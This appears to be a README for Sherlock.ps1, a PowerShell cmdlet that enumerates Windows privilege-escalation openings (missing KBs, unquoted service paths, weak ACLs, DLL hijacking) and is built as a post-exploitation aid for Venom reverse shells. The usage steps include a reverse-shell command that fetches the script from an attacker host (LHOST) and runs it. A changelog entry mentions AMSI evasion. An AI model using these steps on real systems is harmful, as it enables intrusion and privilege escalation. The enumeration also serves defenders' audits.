Find missing software patches\Paths for privilege escalation (windows)
'Find missing software patches (or vulnerabilities) for privilege escalation on windows ( vista | 7 | 8 | 8.1 | 10 )'
Author: @_RastaMouse (Deprecated)
CmdLet: @r00t-3xp10it (v1.3)
Tested Under: Windows 10 (18363) x64 bits, Windows 7 x64 bits
Required Dependencies: none
Optional Dependencies: none
PS cmdlet Dev version: v1.3
What Is Privilege Escalation and Why Is It Important?
Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system admin can perform unauthorized actions.
Most computer systems are designed for use with multiple user accounts, each of which has abilities known as privileges. Common privileges include viewing and editing files, or modifying system files. Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used.
[1] - Cmdlet Description
[2] - Cmdlet Parameters
[3] - CmdLet Basic Usage
[4] - Download Cmdlet
[5] - Final Notes
[6] - Report Issues
CmdLet to find missing software patches (or vulnerabilities) for privilege escalation on windows ( vista | 7 | 8 | 8.1 | 10 )
This CmdLet continues the @rasta-mouse (Deprecated) module with new 2020 CVE entries and a new function to find missing security KB patches by comparing the list of installed patches against the Sherlock KB list entries ($dATAbASE). This Cmdlet also searches for 'Unquoted service paths' (EoP vulnerability) and recursively searches for folders with Everyone:(F) permissions (ACL).
Sherlock CmdLet was created to be a Venom v1.0.17.7 post-exploitation auxiliary script to be executed in venom amsi evasion reverse tcp shells. But it can also be executed in a local environment to help Blue Teams identify EoP entry points.
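The missing-KB comparison described above, as an added example (this is not Sherlock's own Get-HotFixs): installed HotFix ids are read from Get-HotFix and compared against a caller-supplied baseline list. Sherlock keeps that baseline in its $dATAbASE; here it is a parameter, and the KB numbers used in the demo call are constructed placeholders. Assumes Windows PowerShell 5.1 or later.

```powershell
# Added example, not Sherlock's Get-HotFixs: report baseline KB ids that are not
# present in the host's installed HotFix list. Assumes Windows PowerShell 5.1+.

function Format-KB {
    # Normalise 'kb4534306', '4534306' and 'KB4534306' to one 'KB4534306' form so
    # that hand-written baselines and Get-HotFix output compare reliably
    param([Parameter(Mandatory)][string]$Id)
    return ('KB' + ($Id.Trim() -replace '^KB', '')).ToUpper()
}

function Get-MissingKB {
    [CmdletBinding()]
    param(
        # KB ids expected on this build (the caller's baseline; Sherlock reads
        # the equivalent list from its $dATAbASE)
        [Parameter(Mandatory)][string[]]$ExpectedKBs,

        # Installed ids; defaults to the live Get-HotFix query, which reads the
        # Win32_QuickFixEngineering store, but accepts a constructed list so the
        # comparison logic can be exercised offline
        [string[]]$InstalledKBs = @(Get-HotFix | Select-Object -ExpandProperty HotFixID)
    )

    $installed = @($InstalledKBs | ForEach-Object { Format-KB $_ })
    foreach ($kb in $ExpectedKBs) {
        $id = Format-KB $kb
        if ($installed -notcontains $id) {
            [pscustomobject]@{ HotFixID = $id; Status = 'MISSING' }
        }
    }
}

# Constructed demo data (placeholder KB numbers, not a real baseline):
$demoExpected  = @('KB1000001', 'KB1000002', 'kb1000003')
$demoInstalled = @('KB1000001', '1000003')
Get-MissingKB -ExpectedKBs $demoExpected -InstalledKBs $demoInstalled

# Live host: supply only the baseline and let Get-HotFix provide the installed list
# Get-MissingKB -ExpectedKBs $demoExpected
```

One caveat a practitioner will want: Get-HotFix only sees updates recorded in the QuickFixEngineering store, and a cumulative update that supersedes an older KB does not carry the older KB id. A 'MISSING' hit is therefore a lead to confirm against the OS build number (the page's own test host is build 18363), not proof that the fix is absent.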
'The following 3 steps describe how to use the Sherlock post-exploitation auxiliary PS script on venom reverse tcp shells'
1º - Place this cmdlet in the attacker machine's apache2 webroot (bash prompt)
cp venom/aux/Sherlock.ps1 /var/www/html/Sherlock.ps1
2º - Then upload Sherlock using the reverse tcp shell prompt
cmd /c curl http://LHOST/Sherlock.ps1 -o %tmp%\Sherlock.ps1
3º - Now remotely execute Sherlock using the reverse tcp shell prompt
powershell -W 1 Import-Module -Name "$Env:TMP\Sherlock.ps1" -Force;Find-AllVulns
The following screenshot shows Sherlock being executed through the webserver (Venom v1.0.17.7 aux script) reverse tcp shell.
Function | Argument | Privileges | Description | Supported
---|---|---|---|---
Get-HotFixs | $null | 🚶 UserLand | Find missing KB (HotFix) security packages | Windows Vista, 7, 8, 8.1, 10
Get-GroupNames | $null | 🚶 UserLand | List ALL Group Names available | Windows Vista, 7, 8, 8.1, 10
Get-Rotten | $null | 🚶 UserLand | Find Rotten Potato vulnerable settings (EoP) | Windows Vista, 7, 8, 8.1, 10
Get-Unquoted | $null | 🚶 UserLand | Find Unquoted service vulnerable paths (EoP) | Windows Vista, 7, 8, 8.1, 10
Get-Paths | $null | 🚶 UserLand | Search for folders with Everyone:(F) permissions | Windows Vista, 7, 8, 8.1, 10
Get-Paths | BUILTIN\Users | 🚶 UserLand | Search for BUILTIN\Users Group Name folders | Windows Vista, 7, 8, 8.1, 10
Get-RegPaths | $null | 🚶 UserLand | Find Weak Registry Permissions (EoP) | Windows Vista, 7, 8, 8.1, 10
Get-ModifiableRegPaths | $null | 🚶 UserLand | Find service registry keys with User:(M) | Windows Vista, 7, 8, 8.1, 10
Get-DllHijack | EnvPaths | 🚶 UserLand | Finds all %PATH% .DLL hijacking opportunities | Windows Vista, 7, 8, 8.1, 10
Get-DllHijack | $null | 🚶 UserLand | Scans for DLLs prone to hijacking (@adamkramer) | Windows Vista, 7, 8, 8.1, 10
Find-AllVulns | $null | 🚶 UserLand | Scans for CVEs (EoP) using the Sherlock $dATAbASE | Windows Vista, 7, 8, 8.1, 10
Use-AllModules | $null | 🚶 UserLand | Run ALL Sherlock enumeration modules | Windows Vista, 7, 8, 8.1, 10
Use-AllModules | FullRecon | 🚶 UserLand | Run Sherlock FullRecon enumeration modules | Windows Vista, 7, 8, 8.1, 10
Remark: the dll_hijack_detect binary might be flagged 'suspicious' by Anti-Virus, but it still executes (just don't send samples to $M).
References (link text from the original page): rotten potato - from account to system; pentestlab - unquoted service path; travisaltman - EoP by weak service permissions; adamkramer - Detecting dll hijacking on windows.
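The unquoted-service-path check that Get-Unquoted performs, written out as an added example (not Sherlock's own code): every Win32_Service record whose binary path contains a space but does not start with a double quote is reported, with the same LocalSystem StartName filter that the changelog lists for v1.3.1. The sample service records at the end are constructed so the filter can be seen working without a live host. Assumes Windows PowerShell 5.1 or later.

```powershell
# Added example, not Sherlock's Get-Unquoted: list services whose executable
# path contains a space and is not quoted. Assumes Windows PowerShell 5.1+.

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param(
        # Service records; defaults to a live Win32_Service query but accepts
        # constructed objects with Name/PathName/StartName/StartMode for offline runs
        [object[]]$Services = @(Get-CimInstance -ClassName Win32_Service),

        # By default only services running as LocalSystem are reported (the
        # $_.StartName -ieq 'LocalSystem' filter Sherlock v1.3.1 added);
        # -AllAccounts lifts that restriction
        [switch]$AllAccounts
    )

    foreach ($svc in $Services) {
        $path = [string]$svc.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { continue }

        # A path that starts with a double quote is already safe
        if ($path.TrimStart().StartsWith('"')) { continue }

        # Isolate the executable: everything up to the first '.exe' (-match is
        # case-insensitive), so arguments such as '-k netsvcs' do not count
        $exe = if ($path -match '^(?<exe>.*?\.exe)') { $Matches['exe'] } else { $path }

        # Only a space inside the executable path itself is a problem
        if ($exe -notmatch ' ') { continue }

        # %SystemRoot% subfolders are protected by default; leave them out to reduce noise
        if ($exe -like "$env:SystemRoot\*") { continue }

        if (-not $AllAccounts -and $svc.StartName -ine 'LocalSystem') { continue }

        [pscustomobject]@{
            Name      = $svc.Name
            StartName = $svc.StartName
            StartMode = $svc.StartMode
            PathName  = $path
        }
    }
}

# Constructed sample records (not from any real host) to exercise the filter:
$sample = @(
    [pscustomobject]@{ Name = 'QuotedSvc';   PathName = '"C:\Program Files\Vendor App\svc.exe" -run'; StartName = 'LocalSystem'; StartMode = 'Auto' }
    [pscustomobject]@{ Name = 'UnquotedSvc'; PathName = 'C:\Program Files\Vendor App\svc.exe -run';   StartName = 'LocalSystem'; StartMode = 'Auto' }
    [pscustomobject]@{ Name = 'UserSvc';     PathName = 'C:\Tools\Other App\agent.exe';               StartName = 'NT AUTHORITY\NetworkService'; StartMode = 'Manual' }
)
Get-UnquotedServicePath -Services $sample | Format-Table -AutoSize

# Live host, all accounts:
# Get-UnquotedServicePath -AllAccounts | Format-Table -AutoSize
```

Why an unquoted path matters: when the service manager starts 'C:\Program Files\Vendor App\svc.exe', Windows resolves the ambiguous string by trying each space-delimited prefix as a program name, so a writable parent directory on that path lets an attacker's binary be started with the service's account. The fix is configuration, not code: quote the binary path in the service definition (sc.exe config with binPath= set to the path wrapped in escaped double quotes) and make sure the parent directories are not writable by unprivileged groups.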
Remark: Sherlock by default uses 'Everyone' (Group Name) to search for the 'FullControl' privilege set (weak folders|services).
Remark: Always use double quotes if the 'Group Name' contains any spaces in argument declarations.
Recommended Group Names to search for EoP vulnerabilities

Vulnerable Group Name | Permissions | Severity | Sherlock Scan
---|---|---|---
Everyone | FullControl | High | Automatic
BUILTIN\Users | FullControl | Medium | Manual
NT AUTHORITY\INTERACTIVE | FullControl | Medium | Manual

Remark: If 'PS C:\> Use-AllModules FullRecon' is executed then ALL vulnerable Group Names will be scanned.
Recommended permissions to search for EoP vulnerabilities

Permissions | icacls | Severity | Sherlock Scan
---|---|---|---
FullControl | (F) | High | Automatic
Write | (W) | High | Manual
ReadAndExecute | (RX) | Medium | Manual
Modify | (M) | Medium | Manual

Remark: If 'PS C:\> Use-AllModules FullRecon' is executed then Permissions (F) (W) (M) will be scanned.
Get-Help Cmdlet
Get-Help .\Sherlock.ps1 -full
Import Module
SYNTAX : Import-Module -Name <Absolute-Path> -Force
Import-Module -Name $Env:TMP\Sherlock.ps1 -Force
List all Group Names available
Get-GroupNames
Find missing KB (HotFix) patches
Get-HotFixs
Find Rotten Potato vulnerable settings
Get-Rotten
Find Unquoted service vuln paths
Get-Unquoted
Find folders with Everyone:(F) permissions
Get-Paths
Find folders with Everyone:(ReadAndExecute) permissions
SYNTAX : Get-Paths <FileSystemRights>
Get-Paths ReadAndExecute
Find folders with BUILTIN\Users:(FullControl) permissions
SYNTAX : Get-Paths <FileSystemRights> <IdentityReference>
Get-Paths FullControl BUILTIN\Users
Find Weak Services Registry Permissions - Everyone:(F)
Get-RegPaths
Find Weak Services Registry Permissions - BUILTIN\Users:(F)
SYNTAX : Get-RegPaths <IdentityReference>
Get-RegPaths BUILTIN\Users
Checks the permissions of registry keys and returns the ones that the current user can modify.
Get-ModifiableRegPaths
Scans for DLLs prone to hijacking
Get-DllHijack
Finds all %PATH% .DLL hijacking opportunities.
Get-DllHijack EnvPaths
Scans for CVEs (EoP) using the Sherlock $dATAbASE
Find-AllVulns
Use ALL Sherlock Modules at once (all-functions)
Use-AllModules
Use ALL Sherlock Modules at once (all functions, with manual argument inputs)
Get-HotFixs;Get-Rotten;Get-Paths ReadAndExecute BUILTIN\Users;Get-RegPaths BUILTIN\Administrators;Find-AllVulns
Wget Download|Manual download [STABLE Version]
wget https://raw.githubusercontent.com/r00t-3xp10it/venom/master/aux/sherlock.ps1
Get-Help Cmdlet
Get-Help .\Sherlock.ps1 -full
Import Module [Mandatory]
SYNTAX : Import-Module -Name <Absolute-Path> -Force
Import-Module -Name $Env:TMP\Sherlock.ps1 -Force
Use-AllModules (FullRecon)
Remark: the FullRecon @argument scans for the Everyone, BUILTIN\Users and NT AUTHORITY\INTERACTIVE Group Names with FullControl (F), Write (W) and Modify (M) permissions, recursively over the $Env:PROGRAMFILES and PROGRAMFILES(x86) folders.
The FullRecon @argument will auto-detect the target host's Group Names in different languages (English, Portuguese, French, etc.).
Use-AllModules FullRecon
Sherlock has proven to be a project in permanent development, simply because escalation of privileges encompasses many different techniques. For that reason I will continue to develop Sherlock whenever possible. (with new version releases)
Current ChangeLog
Version | Update Date | Update Info | Description | DevStage | Repo
---|---|---|---|---|---
v1.3 | 01/01/2021 | Official Release | Released Sherlock version v1.3 | STABLE | GitHub
v1.3.1 | 02/01/2021 | CVE-2020-0986 | splWOW64.sys Local Elevation of Privileges | BETA | Gist
v1.3.1 | 02/01/2021 | Unquoted services | $_.StartName -ieq 'LocalSystem' filter added | BETA | Gist
v1.3.1 | 02/01/2021 | Get-DllHijack | Search for dll's prone to hijacking function | BETA | Gist
v1.3.1 | 02/01/2021 | $M CVE assign nº | CVE-2020-0986 assigned to CVE-2020-17008 | BETA | Gist
v1.3.1 | 03/01/2021 | Official Release | Released Sherlock version v1.3.1 | STABLE | GitHub
v1.3.2 | 04/01/2021 | Get-DllHijack | Corrupted download checks (x86\|x64) bugfix | BETA | Gist
v1.3.2 | 04/01/2021 | Get-DllHijack | &"$Env:TMP\$ArchiveName.exe" (Ampersand exec) | BETA | Gist
v1.3.2 | 04/01/2021 | Get-DllHijack | EnvPaths @argument added to Get-DllHijack | BETA | Gist (*)
v1.3.2 | 04/01/2021 | Use-AllModules | Run ALL Sherlock enumeration modules | BETA | Gist
v1.3.2 | 05/01/2021 | Official Release | Released Sherlock version v1.3.2 | STABLE | GitHub
v1.3.3 | 05/01/2021 | Use-AllModules | FullRecon enumeration @argument added | BETA | Gist
v1.3.3 | 06/01/2021 | CVE-2020-25106 | SUPREMO (rat) Local Privilege Escalation | BETA | Gist
v1.3.3 | 06/01/2021 | Get-HotFixs | Windows 8.1 x64 bits HotFix database | BETA | Gist
v1.3.3 | 06/01/2021 | CVE-2020-1048 | Ualapi.dll Microsoft Spooler Local EoP | BETA | Gist
v1.3.3 | 06/02/2021 | Use-AllModules | FullRecon @argument searches for cmdkey creds | BETA | Gist
v1.3.3 | 08/01/2021 | CVE-2020-5752 | Bypassing Anti-Virus amsi string detection | BETA | Gist
v1.3.3 | 08/01/2021 | Official Release | Released Sherlock version v1.3.3 | STABLE | GitHub
v1.3.4 | 12/01/2021 | Get-ModifiableRegPaths | New EoP scan technique added to Sherlock | BETA | Gist
v1.3.4 | 13/01/2021 | Get-GroupNames | List ALL Group Names available | BETA | Gist
v1.3.4 | 13/01/2021 | Get-HotFixs | Windows 10 x64 bits KB list update | BETA | Gist
v1.3.4 | 13/01/2021 | CVE-2021-1642 | AppX Deployment Service (AppXSVC) EoP | BETA | Gist
v1.3.4 | 15/01/2021 | Official Release | Released Sherlock version v1.3.4 | STABLE | GitHub
(*) Checks if the current %PATH% has any directories that are writeable (W) by the current user.
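Two of the ACL scans the page describes share one permission test, so they are shown together in one added example (not Sherlock's own Get-Paths or Get-DllHijack EnvPaths): a recursive search of the Program Files trees for folders that grant a chosen Group Name a chosen FileSystemRights value (the Get-Paths <FileSystemRights> <IdentityReference> syntax from the usage section, with the three Group Names and the (F)/(W)/(M) rights from the parameter tables), and the %PATH% writability check that the (*) footnote above describes. Group Names are matched by well-known SID rather than display name, which is one way to get the language-independent matching the FullRecon remark talks about. Function names, the SID table and the Deny-ACE simplification are this example's own choices. Assumes Windows PowerShell 5.1 or later.

```powershell
# Added example, not Sherlock's code: shared ACL test, a recursive weak-folder
# scan and a writable-%PATH% check. Assumes Windows PowerShell 5.1+.

function Resolve-Sid {
    # Map the Group Names the page recommends to well-known SIDs; comparing SIDs
    # instead of display names keeps the scan working on localized Windows installs
    param([Parameter(Mandatory)][string]$Identity)
    $wellKnown = @{
        'Everyone'                 = 'S-1-1-0'
        'BUILTIN\Users'            = 'S-1-5-32-545'
        'NT AUTHORITY\INTERACTIVE' = 'S-1-5-4'
    }
    if ($wellKnown.ContainsKey($Identity)) {
        return New-Object System.Security.Principal.SecurityIdentifier $wellKnown[$Identity]
    }
    if ($Identity -like 'S-1-*') {
        return New-Object System.Security.Principal.SecurityIdentifier $Identity
    }
    # Any other name is looked up through the local SAM / domain
    return (New-Object System.Security.Principal.NTAccount $Identity).Translate(
        [System.Security.Principal.SecurityIdentifier])
}

function Test-AclGrant {
    # $true when an Allow ACE for $Sid contains every bit of $Rights.
    # Simplification: Deny ACEs are not evaluated, so treat hits as leads to confirm.
    param(
        [Parameter(Mandatory)][System.Security.AccessControl.FileSystemSecurity]$Acl,
        [Parameter(Mandatory)][System.Security.Principal.SecurityIdentifier]$Sid,
        [Parameter(Mandatory)][System.Security.AccessControl.FileSystemRights]$Rights
    )
    foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $aceSid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) }
        catch { continue }   # orphaned identities that cannot be translated are skipped
        if ($aceSid.Value -ne $Sid.Value) { continue }
        # Bitwise subset test: a FullControl ACE also satisfies a request for Write or Modify
        if (([int]$ace.FileSystemRights -band [int]$Rights) -eq [int]$Rights) { return $true }
    }
    return $false
}

function Find-WeakFolder {
    # Recursive scan of the Program Files trees for folders granting $Identity $Rights
    param(
        [string[]]$Root = @($env:ProgramFiles, ${env:ProgramFiles(x86)}),
        [string]$Identity = 'Everyone',
        [System.Security.AccessControl.FileSystemRights]$Rights = 'FullControl'
    )
    $sid = Resolve-Sid $Identity
    foreach ($r in $Root) {
        if (-not $r -or -not (Test-Path -LiteralPath $r)) { continue }
        Get-ChildItem -LiteralPath $r -Directory -Recurse -ErrorAction SilentlyContinue |
            ForEach-Object {
                # Get-Acl fails on folders the caller cannot read; those are skipped
                $acl = Get-Acl -LiteralPath $_.FullName -ErrorAction SilentlyContinue
                if ($acl -and (Test-AclGrant -Acl $acl -Sid $sid -Rights $Rights)) {
                    [pscustomobject]@{ Path = $_.FullName; Identity = $Identity; Rights = $Rights }
                }
            }
    }
}

function Get-WritablePathDir {
    # Directories on %PATH% where the current user, or any group in the user's
    # token, holds Write: the condition the page's (*) footnote describes
    param([string]$PathVar = $env:PATH)
    $token  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($token.User) + @($token.Groups)
    foreach ($dir in ($PathVar -split ';')) {
        if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { continue }
        $acl = Get-Acl -LiteralPath $dir -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($sid in $mySids) {
            if (Test-AclGrant -Acl $acl -Sid $sid -Rights Write) {
                [pscustomobject]@{ Path = $dir; GrantedTo = $sid.Value }
                break
            }
        }
    }
}

# Example calls on a live host:
# Find-WeakFolder                                            # Everyone:(F) under Program Files
# Find-WeakFolder -Identity 'BUILTIN\Users' -Rights Modify   # the (M) row from the table
# Get-WritablePathDir
```

Because Test-AclGrant only reads Allow entries, a folder with an explicit Deny for the same group will still be listed; confirm each hit with icacls (the column the permissions table uses) or by an actual access check before reporting it. A writable %PATH% directory matters for the same reason the dll_hijack_detect scan exists: a program that loads a DLL by bare name walks the search path, and the remediation is to remove or tighten the ACL on that directory rather than to rely on load order.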
Sherlock v1.3.4 [BETA] https://gist.github.com/r00t-3xp10it/7438f5b5dcb7fd02f7bf6dcca64959ee
Url: https://www.exploit-db.com/
Url: https://0day.today/platforms/windows
Url: https://packetstormsecurity.com/files/os/windows/
Url: https://github.com/r00t-3xp10it/venom/blob/master/aux/sherlock.ps1
Url: https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842
Url: http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/
Url: https://github.com/r00t-3xp10it/venom/wiki/CmdLine-&-Scripts-for-reverse-TCP-shell-addicts
Url: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/